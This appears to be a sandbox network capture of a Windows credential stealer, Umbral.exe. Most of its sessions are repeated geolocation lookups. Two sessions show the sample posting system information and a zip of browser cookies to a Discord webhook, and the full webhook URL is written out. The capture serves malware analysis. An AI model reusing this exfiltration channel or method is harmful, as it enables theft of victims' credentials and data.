                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:37 UTC  67                 OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:37 UTC  639                IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:37 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CgQuezb4hBcindgaJeD2djeJ03gFVcjTDHAGb1WbCYxnN4jijdU8R7E8lT%2BtDWE0YpApCmWq%2BICO4J8LpwelwWyJyeWGAp2PwwJR2H3P%2FQFBGrdQmmv007quJ1tiDm8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258606abec32c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:37 UTC  167                IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      11          192.168.2.5  49725        104.21.85.189   443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:38 UTC  64                 OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:38 UTC  737                IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27365
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRZ2WT2RPQRVMFHJTMQQ6
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLXYp%2BX4ehOAKvEKmx%2F%2F0uCXvVbooFbHg2xMXHphX1q%2F0LZoKviJ4zHwbOG3E727TJEjz9PamVNRyGFbmIN0B73dakgtcBKjZ1HeM1tnE9eirCFA91928EqqcbLf"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25866d9ec7d1e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:38 UTC  632    IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:38 UTC  1369   IN         Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:38 UTC  1088   IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:47:38 UTC  5      IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      12          192.168.2.5  49726        188.114.97.3    443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:40 UTC  67     OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:40 UTC  641    IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:40 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:40 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xXS8i1PND5XTwB%2Bn%2FshzI1jOdWSefqBlKVyXgLVDrxc9FJptpOUrNiyicnKVfSP8JBn%2BOGuGhl0Lr5MS%2BQHYxWL9dqW7NrnakV3mCw0icj36ZDntBodOO7V3LUEi0kP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258740e2cc425-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:40 UTC  167    IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      13          192.168.2.5  49727        104.21.85.189   443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:41 UTC  64     OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:41 UTC  735    IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:41 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33316
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VS1RY8HR6ANAJX6PW7VKP
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzEtaSrIDsbh0oXNd4VoJFMlGK2mJzpKW33Ez1EWk9WO7yPMqgLjPmxY6bOXZrJpq%2BuKGosIO5eJgx0LPJImcJCPpSJ%2BTY3567%2B2Q2qLH7VNhZ6XKj50EEPiN7uZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258780f5d43fd-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:41 UTC  634    IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:41 UTC  1369   IN         Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:47:41 UTC  1086   IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:47:41 UTC  5      IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      14          192.168.2.5  49729        188.114.97.3    443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:45 UTC  67     OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:45 UTC  643    IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:45 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKTwFk5U2ygH0CiXZkVpnwOIFyU%2BjW3BxKfx3%2FNU7%2FyKdex47qUvMQGNNP2lBUphq8w2zKJls2IkM%2FqEK%2FWnz30e4GDQQdPtKw7WcPzT6bP9LPzr6Hv1WiqsLg9iBx9Z"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2589309594333-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:45 UTC  167    IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      15          192.168.2.5  49730        104.21.85.189   443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:46 UTC  64     OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:46 UTC  732    IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 24
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VS6K8GVVQKTRT2SHN0H3W
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWzdHqkVWWmftKRCDeKCYrRN9%2BejA4SbAC2HUQ1wf4FcmdP%2BGtXvh1NLFVzbo%2FhxIeYxp87dUOxFnnQyq0OxoQ5V1QhsWYk6hPJPIk7lo5GxHF1lVml8GPTlnDK"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25896e9e515d7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:46 UTC  637    IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:46 UTC  1369   IN         Data Ascii: ; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100v
                                      2024-09-06 23:47:46 UTC  1083   IN         Data Ascii: path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:47:46 UTC  5      IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                      16          192.168.2.5  49732        162.159.135.232  443               2316  C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:49 UTC  360    OUT        POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC  25     IN         HTTP/1.1 100 Continue
                                      2024-09-06 23:47:50 UTC  941    OUT        Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:47:50 UTC  1369   IN         HTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=6d301fc26caa11efa3d2c623c3b98d08; Expires=Wed, 05-Sep-2029 23:47:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666471
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBchsQlQ4GOx%2FXyO0hFkldTXnRW%2FAhlPr1peuVxxsSolP2BXGZ4op0fn3k8uoTP1R7zkpB0uilGShD0Vj%2BMC3uIP2Ku7%2FdoK0d3Zq1gSSyqN6V8f%2BjP9m1xndT5p"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=6d301fc26caa11efa3d2c623c3b98d08c1f95b58700f8a4571545f2214b20896420ace1a3b8fe25cc0b20d985e4d9dfe; Expires=Wed, 05-Sep-2029 23:47:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=9faf4540b5e2e5ca23872438014c6cbdeec7fa72-1725666470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie:
                                      2024-09-06 23:47:50 UTC  200    IN         Data Ascii: _cfuvid=nJG84acD1XwNdOSm8zN_iTOH12998GxsUsbMG6O2Ch0-1725666470400-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf258ac7c29423e-EWR


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      17          192.168.2.5  49734        188.114.97.3    443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:50 UTC  67     OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC  639    IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:50 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tb1%2FNJ149u7aMkY6asfQMmgbkcgKAJDmrBUfgctFPAtG7N37NUUUxCeUmNruoo2%2FiPnK6JZcqOet4qr3DkS0wbpT43iYBKDfcMnV%2BuiQ3aEFkYfHoIXJrUWyCkJk8167"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258af3b7243ef-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:50 UTC  167    IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      18          192.168.2.5  49735        104.21.85.189   443
                                      Timestamp                Bytes  Direction  Data
                                      2024-09-06 23:47:50 UTC  64     OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC  734    IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7871
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSAZWHJN4VQSRHZX4485H
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxyH9xG%2BA25CKhwaL6jxsH8eZ3JesWF05W8qIANunKM8WKIGFexREnq6SSDPm3XInYVIOqDxqdFOnyXfjK8BZ6Oy2YsIPKQdgN%2B2wYbrCZ7p%2BU8L9Afxk87J6Oqe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258b30c3742bc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:50 UTC  635    IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:50 UTC  1369   IN         Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:47:50 UTC  1085   IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:47:50 UTC  5      IN         Data Ascii: 0


                                      Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 162.159.135.232 | Destination Port: 443 | PID: 2316 | Process: C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:50 UTC | 684 | OUT | POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="86cdf539-8c56-4021-b5f7-2a105be5405a"
                                      Host: discord.com
                                      Cookie: __dcfduid=6d301fc26caa11efa3d2c623c3b98d08; __sdcfduid=6d301fc26caa11efa3d2c623c3b98d08c1f95b58700f8a4571545f2214b20896420ace1a3b8fe25cc0b20d985e4d9dfe; __cfruid=9faf4540b5e2e5ca23872438014c6cbdeec7fa72-1725666470; _cfuvid=nJG84acD1XwNdOSm8zN_iTOH12998GxsUsbMG6O2Ch0-1725666470400-0.0.1.1-604800000
                                      Content-Length: 454876
                                      Expect: 100-continue
                                      2024-09-06 23:47:51 UTC | 25 | IN | HTTP/1.1 100 Continue
                                      2024-09-06 23:47:51 UTC | 40 | OUT | Data Ascii: --86cdf539-8c56-4021-b5f7-2a105be5405a
                                      2024-09-06 23:47:51 UTC | 140 | OUT | Data Ascii: Content-Type: application/zip
                                      Content-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:47:51 UTC | 16355 | OUT | Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:47:51 UTC | 1369 | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:51 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666472
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPbGVaWH1N%2BzWLqHFKQi9OgzYtLs%2BDLWR828Vpw3UPlELLVXhyPxOq%2FCEEioGOsy1c5UBfAq5%2FJJQ1C5aVsg4PUrwPQ9H%2BnLvU23HivCETRzCJzTMvI4whgB367m"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf258b3d8734251-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762825542303845","filename":"Umbral-927537.zip","size":454652,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=66dce627&is=66db94a7&hm=6da8e35b58c226818205212d93fc7cf4a7c84508c067ccc0ecb5379ccf9b76a3&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/128176282554


                                      Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49739 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:52 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:52 UTC | 645 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:52 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:52 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOGvgZorAqqysZJmI44c6exIq69Nid7RoudCI%2FEBj8QU4QkZY%2Fsf2Njkt0gr%2FSL5tzfzbtokDT6SfzgSGh1m%2Fg7BSvu46ngUGTM3lt%2BY2MMj5%2BzLoutJ1nDDBts5FURc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258bfdf7d0f84-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:52 UTC | 167 | IN | Data Ascii:
                                      <html>
                                      <head><title>301 Moved Permanently</title></head>
                                      <body>
                                      <center><h1>301 Moved Permanently</h1></center>
                                      <hr><center>cloudflare</center>
                                      </body>
                                      </html>


                                      Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49742 | Destination IP: 104.21.85.189 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:53 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:53 UTC | 733 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27380
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSDK8VBW36FGQW2WATK2B
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6srdPrqol7Q3hUrVBUb8IH9mBB9V2pFA131CJRyn9XtL3hzB3YsmBpqvc%2Fe9y4JRI48QI8gXPICVdasgKiAcpDzKA5lrC9Gr2DcX7BDIcm24lVPcpXC1%2Bm5rMWPb"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258c3bce48ce0-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:53 UTC | 636 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:53 UTC | 1369 | IN | Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100
                                      2024-09-06 23:47:53 UTC | 1084 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329493
                                      2024-09-06 23:47:53 UTC | 5 | IN | Data Ascii: 0 (terminating zero-length chunk)


                                      Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49748 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:57 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:57 UTC | 639 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:57 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:57 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeR82bMoITR6A4t7cvKhBnt6QDKArwwIiseoCgdao0Ks%2Fh8IB38HeY0ww1Xc7IZFYSXlnN4PANCOGvNRNeI7tFNVvKfWAShRP%2BHbPKydWRrgH6XCIpzikyS63Wxuw%2B3G"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258dcbdf9189d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:57 UTC | 167 | IN | Data Ascii:
                                      <html>
                                      <head><title>301 Moved Permanently</title></head>
                                      <body>
                                      <center><h1>301 Moved Permanently</h1></center>
                                      <hr><center>cloudflare</center>
                                      </body>
                                      </html>


                                      Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49749 | Destination IP: 104.21.85.189 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:58 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:58 UTC | 735 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:58 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 19232
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSJ4EH95V1KZHVGFJD469
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOHCsR%2BB38YszEFOwXKdKvNSIpf9pLAaZf%2Fw3J0Sjt0k26ka2yw90BHa98GJ53GJMgv5RzZ%2FcV0O6t4XAQAohSXBUPJfgpVIKyhlqJzsCEzkWHQRLi4C2Yc9Hl6d"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258e0bfb1728f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:58 UTC | 634 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:58 UTC | 1369 | IN | Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:47:58 UTC | 1086 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:47:58 UTC | 5 | IN | Data Ascii: 0 (terminating zero-length chunk)


                                      Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49750 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:00 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:00 UTC | 639 | IN | HTTP/1.1 301 Moved Permanently
